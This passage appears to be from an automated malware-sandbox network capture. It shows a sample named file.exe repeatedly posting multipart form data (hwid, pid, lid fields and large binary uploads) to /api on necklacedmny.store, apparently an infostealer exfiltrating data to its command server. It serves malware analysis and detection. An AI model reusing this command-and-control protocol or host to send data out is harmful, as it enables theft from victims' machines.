                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pqn0pPWbvTwex7FTT6jeJoj7PM8T%2Fxoci5OQnNkCveNv7J7Y3KkK7tD7tzd98soGH8s%2BfDjzueMJKd5csroLdz58kK9LRw0ZgK1v4%2FDXeuqwyBZTfxvcwyArbf%2FOL0%2BtHfnaK9M%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8da36942ee0f6c79-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1085&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13791&delivery_rate=2569653&cwnd=251&unsent_bytes=0&cid=ce34e0f28d164a6e&ts=4632&x=0"
                                                                            2024-10-29 13:11:27 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.72
                                                                            2024-10-29 13:11:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.749781188.114.97.34437308C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-29 13:11:28 UTC284OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15081
                                                                            Host: necklacedmny.store
                                                                            2024-10-29 13:11:28 UTC15081OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 39 36 30 39 39 46 38 38 42 45 38 38 32 44 31 41 39 41 42 36 33 34 43 37 37 42 38 36 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5496099F88BE882D1A9AB634C77B8617--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-29 13:11:29 UTC1020INHTTP/1.1 200 OK
                                                                            Date: Tue, 29 Oct 2024 13:11:29 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=vatt04ffsenr7h7tnvnktbbgq4; expires=Sat, 22 Feb 2025 06:58:08 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Ppbsh79fv3%2FTuMrYAz8QiJ1Qh4W0jicJQX6nkPtr8lRboiiDRpCZncTIbgt7Z6PI5Puon8UBw4GCqPTXsipFrP%2FNqhnwOC%2BiZhpPCLD4QytsvRIQeFG8c%2BMobGb8mrqZdrbp%2BQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8da36964fe5ae9a4-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16023&delivery_rate=2145185&cwnd=251&unsent_bytes=0&cid=40efd7adfa04b51c&ts=642&x=0"
                                                                            2024-10-29 13:11:29 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.72
                                                                            2024-10-29 13:11:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.749788188.114.97.34437308C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-29 13:11:30 UTC284OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20406
                                                                            Host: necklacedmny.store
                                                                            2024-10-29 13:11:30 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 39 36 30 39 39 46 38 38 42 45 38 38 32 44 31 41 39 41 42 36 33 34 43 37 37 42 38 36 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5496099F88BE882D1A9AB634C77B8617--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-29 13:11:30 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d
                                                                            Data Ascii: (X6K~`iO\_,mi`m?ls}Qm
                                                                            2024-10-29 13:11:30 UTC1012INHTTP/1.1 200 OK
                                                                            Date: Tue, 29 Oct 2024 13:11:30 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=bh2r1ve0urt6miosrgp70e0qj4; expires=Sat, 22 Feb 2025 06:58:09 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kUPCPvxrDDxP6A5OUVY9LGI8BFURCfT1Z6G5hMSpotHJ8rk7yT5iRdPRVdUTNOFzxbqyiJJdW34dqFaYMchLZ2J61GAITXBcBdSn0hnStXzGNsY8ME%2FgtHn1OFXrOSQYa69XqI4%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8da3696deb734761-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=958&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21370&delivery_rate=2844793&cwnd=246&unsent_bytes=0&cid=2620517331fdb98d&ts=675&x=0"
                                                                            2024-10-29 13:11:30 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.72
                                                                            2024-10-29 13:11:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.749799188.114.97.34437308C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-29 13:11:31 UTC283OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1243
                                                                            Host: necklacedmny.store
                                                                            2024-10-29 13:11:31 UTC1243OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 39 36 30 39 39 46 38 38 42 45 38 38 32 44 31 41 39 41 42 36 33 34 43 37 37 42 38 36 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5496099F88BE882D1A9AB634C77B8617--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-29 13:11:33 UTC1020INHTTP/1.1 200 OK
                                                                            Date: Tue, 29 Oct 2024 13:11:33 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=dgk0ssubvm1ubc50cv71erh6p3; expires=Sat, 22 Feb 2025 06:58:11 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=quJsq4lcUm9KVC8p%2FZzI62QS0vBrzK%2BAzLSSQgpS%2BnPRM3hC5g7Xbeil3mESRRCtMm%2B6GIn5nW0go3TtYW1e64uAAXF5hH0lL%2BwtxkZGED2nJ8Y20NYUdfyPBX2%2FpERByi2Ige8%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8da36978b9bdddaf-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2162&delivery_rate=2401326&cwnd=32&unsent_bytes=0&cid=5f2b7bad470b300a&ts=1372&x=0"
                                                                            2024-10-29 13:11:33 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.72
                                                                            2024-10-29 13:11:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.749815188.114.97.34437308C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-29 13:11:34 UTC285OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 551172
                                                                            Host: necklacedmny.store
                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 39 36 30 39 39 46 38 38 42 45 38 38 32 44 31 41 39 41 42 36 33 34 43 37 37 42 38 36 31 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5496099F88BE882D1A9AB634C77B8617--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: 4a 6d 08 96 ec 2d 05 56 2e dc a9 d2 32 4c f1 79 cc 3c 39 7d ab 29 c0 59 86 bd e5 80 e3 10 57 64 86 5d de f7 3e ab 4a 09 22 e2 d5 5c a1 2c 6c d8 bd 8d 69 03 4a 3a af 4d bb 31 52 88 57 ac 02 0e 77 88 9b 14 1b 57 58 86 56 04 7f 86 f6 7d 58 ff f5 8d 36 88 7b f3 ae 9d b0 ad c2 b7 0b d1 2f 93 b9 1e 0c 5f d4 3e 70 49 5f 7b 30 d4 b6 4e f8 89 90 44 54 38 81 2b ca 7f 6d e1 f1 c4 a8 9c 4c 2c 1c 16 4d 7b 10 60 2f 02 cb 65 cb 2d 8c 19 7c 1a ab b9 c7 15 99 f7 e6 41 68 8f 2f 5e 04 f5 8a 8f b8 77 77 fd 7c 31 1e 8c a2 f8 97 b6 cb 32 e6 9c 32 1a c3 75 f9 88 6f 41 72 c8 be 85 f2 8e f8 99 bf 91 e2 8f e0 c7 93 15 00 fd f4 d9 c4 cf d8 cc 1b 7b e1 92 7f a6 fb 08 02 54 3e a2 ae f6 92 74 2c b5 32 77 66 65 89 45 1f d8 d3 85 a7 fb 71 84 99 4e 5a 24 72 7d a4 11 36 e2 0d 20 e5 d4 f4
                                                                            Data Ascii: Jm-V.2Ly<9})YWd]>J"\,liJ:M1RWwWXV}X6{/_>pI_{0NDT8+mL,M{`/e-|Ah/^ww|122uoAr{T>t,2wfeEqNZ$r}6
                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: 82 ce 83 d7 df 25 f9 74 fa 84 12 34 59 f1 c8 30 f3 75 86 d0 ce 24 af 67 92 1e 14 9d b3 b0 8e e4 12 ca ec f9 f1 c0 c6 c7 b7 ec e9 15 2b 86 b9 5f 78 a2 cf df 1a 7e 9c 67 8a 96 14 3b f2 ef 9b 5a 02 fa 8d ed 90 1b 8e d8 44 c0 a3 c0 ea d3 9b 54 27 51 92 24 a5 8f 57 4d fa 93 12 c3 02 38 15 02 35 1e 68 60 e6 63 96 05 9f 71 5e ff 19 41 35 d9 4b 5d 8c 33 aa 18 01 d9 aa 57 5e 43 16 ab f6 a5 0a 19 6e b6 9d 21 0e c2 79 bd 02 f8 59 b1 b5 6e 88 7d 2c ea e6 e9 ab c6 4c 2a 9f f9 e4 82 1c f7 bc cb 21 2c 6c f9 ae 8b 39 da 1e bd b4 21 94 71 e3 6c ae 4a ed 61 09 f3 df 95 f9 29 2d 59 24 10 25 70 6c 93 73 7b fd 1d b2 1c df 69 60 a7 74 8e a8 5f f1 43 ef db 54 e6 fb 42 f5 e3 b9 71 24 f5 2d 95 ae b4 2f df a3 46 4f c1 2a d3 1a e7 f4 19 d2 1e 21 f1 f7 89 df d7 da 9e 6e 25 23 81 d4
                                                                            Data Ascii: %t4Y0u$g+_x~g;ZDT'Q$WM85h`cq^A5K]3W^Cn!yYn},L*!,l9!qlJa)-Y$%pls{i`t_CTBq$-/FO*!n%#
                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: b7 c2 42 0e 2e 18 03 fb a3 ae a8 e9 4e 71 46 36 0f 31 35 25 45 ce e1 ed ce 91 ea 73 34 d3 e0 78 0e 12 29 1f 63 32 d3 8f 57 df 5e bd a5 9b 56 cc da 4f 93 ef 72 ff c7 f5 e3 c1 c4 b2 bc f9 9a ae bb 21 e5 c7 98 e6 dd 16 05 e9 d3 9c da 14 33 eb 41 77 88 f9 a2 ff 14 f1 7d ab 52 f5 0d 10 77 d0 d3 b7 13 eb 82 ae 6c 6e f9 e5 b9 ed 5c a0 72 a7 6f ee ec 81 c1 46 da 0f b1 78 95 27 91 d7 47 fb 28 01 9b f6 78 bc 05 3e 9b c4 cc 50 9f b3 b6 a5 ee 0b 54 ea 5c 8f 77 f6 b8 67 e1 7d 8c 94 cf 8f 9e 5c 1b d9 ba ce dd 9a 4f ec f1 48 f6 29 57 01 36 7e 5d 9a 5d 12 22 37 4b f7 fb 28 4f 39 04 6d c3 6c 74 c3 af fa cc fa 43 67 c7 b8 af fd ac 47 ea 12 f8 98 e5 43 fa c2 b8 a2 4d c5 1d e7 35 86 1e 8a dc 3a d9 73 2b b1 93 5e dc 8d f5 c5 ed c1 7b 90 14 42 a7 10 b1 26 ba 63 62 c4 c5 60 1b
                                                                            Data Ascii: B.NqF615%Es4x)c2W^VOr!3Aw}Rwln\roFx'G(x>PT\wg}\OH)W6~]]"7K(O9mltCgGCM5:s+^{B&cb`
                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: d3 1f 5c b7 3d 1c 8f 19 f9 db ae 2b 7c 99 6f 77 5e b7 5e d4 9c 8b 7c b8 03 78 a6 81 80 0a fb 0d 13 62 8e d7 21 fd 66 96 8c 50 a9 f6 79 6e df 4b 8f 57 ac ec 97 d4 b1 f8 ef 73 35 7e 7f 13 52 2d 4f 42 ad 93 4f fb 36 f7 7f 7a 6a 85 ed 33 2b 6f bc c4 aa 1a fd fe b4 4f 36 2f ed 3e f1 77 f5 c7 59 8f f1 3b 94 e4 4c ab e7 75 57 79 2f 56 32 86 be 3c 15 d0 76 03 94 7a 53 60 6c 5a 5b 33 2c b2 0d 3d 56 b2 79 bb f7 7d 39 bc 6e ef 54 ae 74 45 ec 36 60 e3 a7 ed 66 b2 40 3e 92 35 f4 1b 0d 21 80 a7 0c 27 ff a9 c5 b3 7a 4e 12 27 ca 2f 32 b9 67 87 5a 3b 52 78 37 7b d6 c3 3b 94 73 f2 c8 01 6c d5 99 a2 22 68 72 a6 e8 b3 62 aa 4c 93 1e 8c 89 92 ed 76 7e 12 2e 92 2c 6c 8b 38 9a 25 d1 35 b7 0c 6a 72 22 d9 91 53 c7 7a f5 f2 af ae 86 a8 7e 07 e1 35 7c 9f e9 bb 8a 43 03 c7 e9 af a8
                                                                            Data Ascii: \=+|ow^^|xb!fPynKWs5~R-OBO6zj3+oO6/>wY;LuWy/V2<vzS`lZ[3,=Vy}9nTtE6`f@>5!'zN'/2gZ;Rx7{;sl"hrbLv~.,l8%5jr"Sz~5|C
                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: 39 b6 7a f9 07 4e a5 96 80 fb 35 94 9d 58 bb b3 e1 a4 45 49 f8 fc b1 f9 bd a3 ac f5 e5 d4 bb d6 63 33 43 e9 f4 24 6b 6b b7 0c 14 d9 69 68 4e e0 68 90 04 df fb fe 47 73 e4 7a 4a a8 40 61 7f f2 88 95 49 7a 4c f8 4d 3e d2 53 78 36 d5 84 42 f6 5c 9f 9e 5b 00 44 06 19 98 74 e2 39 77 32 ca f4 e0 77 13 a9 b5 fb f1 29 28 fa ea 45 83 06 c2 b8 34 7a cc 35 c8 98 0b 32 cb 78 e9 76 8f f7 56 d3 c6 f2 ef 8f cf df b2 22 40 cb d2 be 73 28 7f 1f 3a eb 92 0f 3d 56 69 2d 39 03 8d 07 41 2b 1e f6 82 6b 5d 2a 02 4a 80 eb d9 db 36 57 1b 5b 8d 4b 94 ec a8 dd 90 22 b3 78 ef 9c fe 3c 77 15 5f 0d 5f 5f 51 fe 90 18 28 07 ca b4 00 15 e2 76 07 47 9c 5b e7 50 e8 94 62 be b7 5d 5a 55 17 fa 8f 5b fa f2 1d eb 8f 78 69 ed 7b ed a7 4b 61 fe 38 1f 06 54 2d 3d 0e 96 82 14 25 50 89 53 c4 1d 40
                                                                            Data Ascii: 9zN5XEIc3C$kkihNhGszJ@aIzLM>Sx6B\[Dt9w2w)(E4z52xvV"@s(:=Vi-9A+k]*J6W[K"x<w___Q(vG[Pb]ZU[xi{Ka8T-=%PS@
                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: 7e f5 05 28 10 e4 61 79 9a 87 c3 4b 81 9a 2d 4a 9a 6c 82 85 a7 00 42 e5 78 ac 0a 12 19 7e bd ce 5b 1b ef 3d 81 f8 4f 1c f8 2f 82 22 6e ec b6 65 8c 00 1d 31 34 1e 20 71 17 91 2c bd bb 12 60 ca 49 14 33 71 8a 96 26 c2 38 ed c1 c8 79 60 46 88 8b 3a c7 cf c7 05 72 aa 59 ab 27 17 7b a0 c1 d6 91 97 37 77 3e 9e 34 11 c1 4e 4b 46 b6 8b 52 c6 97 3c 0e 56 02 df fb f1 8f e0 cd 82 79 20 48 e4 05 47 11 5f 24 4a 0f a2 4d 29 d8 b6 89 8d eb 23 b0 41 35 22 88 1f bf d0 25 e8 a3 44 3d 26 74 aa 2a 9f a8 c9 85 36 57 ec 55 c2 8e 5f 33 31 23 54 b1 ab 2c 9c 88 3b 89 49 c6 72 45 fb e4 79 96 ca 3f ea 38 4c 78 2a 35 4e cf fe 38 8a 8e de ce 22 7b d0 e5 f3 de a3 22 40 78 f7 52 fe ce f0 dc 81 5f 0a 81 22 6f f6 48 dc 33 a9 5a 05 d3 f4 4e 0e 7a e4 20 5f 56 d9 92 c7 a3 d8 de fd 9e 43 98
                                                                            Data Ascii: ~(ayK-JlBx~[=O/"ne14 q,`I3q&8y`F:rY'{7w>4NKFR<Vy HG_$JM)#A5"%D=&t*6WU_31#T,;IrEy?8Lx*5N8"{"@xR_"oH3ZNz _VC
                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: 64 1d 5b c0 c2 a3 e6 18 86 12 a5 49 23 7c 59 ce 33 3e 4b 30 33 46 8e 9f 4f d3 f9 8f ad 00 b8 8c 1f 74 a7 d6 8d 4b c9 6d 9e 09 ca fb db a0 43 17 95 67 df 51 85 d0 fe c2 af 46 20 9e 34 7f e9 ce 8d d7 3a 82 0b 97 d0 0d ac 6f f5 0c 26 ca b6 d1 f6 49 5f 30 cd 71 3a 8d c2 4b 0c c4 89 1b 73 e4 a0 d1 91 8e 86 3d a6 49 27 a4 4f ce 53 ff 6f 8d fc 2c 1f 78 e9 0a 0f 68 83 a2 7f 21 dd 01 8e f2 bb 5c f1 40 8c 12 88 04 7e bb ea 8e 58 9c 83 0a 1a 01 6d e3 1b 6a b1 f3 5f 22 4d 40 0a 5d 60 43 0c 3b cd a0 3e 3c 4b ec 38 06 06 c4 88 5d 5a 43 94 b8 56 01 1b 02 a0 61 19 3c 93 c4 d6 6b 84 4a a8 0c 1c a7 7b 24 b0 da 5c c4 f1 39 08 1a 80 78 37 b2 cd 4c da 20 3e 02 8e 78 46 86 5c 89 dd 5b 89 10 bf 67 dc 14 75 7e d1 34 5e 9e 3e b2 79 ff ad 05 c1 67 20 3a 2f 5c 0b da 29 9c 80 0a cd
                                                                            Data Ascii: d[I#|Y3>K03FOtKmCgQF 4:o&I_0q:Ks=I'OSo,xh!\@~Xmj_"M@]`C;><K8]ZCVa<kJ{$\9x7L >xF\[gu~4^>yg :/\)
                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: c2 b6 5a 06 d3 1a d0 2e aa 6b b5 fa a2 5c 2c 42 54 20 fc 1e 61 48 04 6b a1 a3 cc 7f bc 5c 7e b6 31 e6 c5 43 2a a0 e6 f1 a3 92 60 fd 7d 71 d2 ba 2b 2c fd 4a fe c1 87 d8 a7 7f d4 c5 10 c3 d8 f8 5d 1a af a5 c8 0d 96 99 aa 76 81 5f 1b 1a ae ef 42 8c 9a 8e d1 9e bd a1 07 23 8e a2 e0 ed c6 2d 3e e2 e0 cd 5d c7 98 ec 72 71 24 ff ac 5a 0b b4 94 ac 36 9b 3b 7c a4 62 7f 37 61 6e 4d a2 05 b3 1d fb 74 d4 7f a6 a5 df 7e 8e 8c 4e 70 c1 00 5b 15 45 86 ff 80 e0 60 02 ec b2 df 56 b1 db 51 eb 68 2b cf c9 2b 99 d8 de 14 2d 3a f5 6e 22 6e 11 11 72 82 58 e8 f2 38 68 f5 92 6e b1 63 b6 9c d4 15 12 57 22 90 f9 62 5a 28 56 38 10 90 59 3d 59 41 58 a9 6a 63 0b 11 85 ac 09 06 5f 7c 67 2f 11 15 16 2c 22 33 f5 e2 4b 8a 94 90 38 d6 f9 d6 e7 54 73 82 cf e5 3c b8 b5 8d fb 63 5b 00 1c bf
                                                                            Data Ascii: Z.k\,BT aHk\~1C*`}q+,J]v_B#->]rq$Z6;|b7anMt~Np[E`VQh++-:n"nrX8hncW"bZ(V8Y=YAXjc_|g/,"3K8Ts<c[
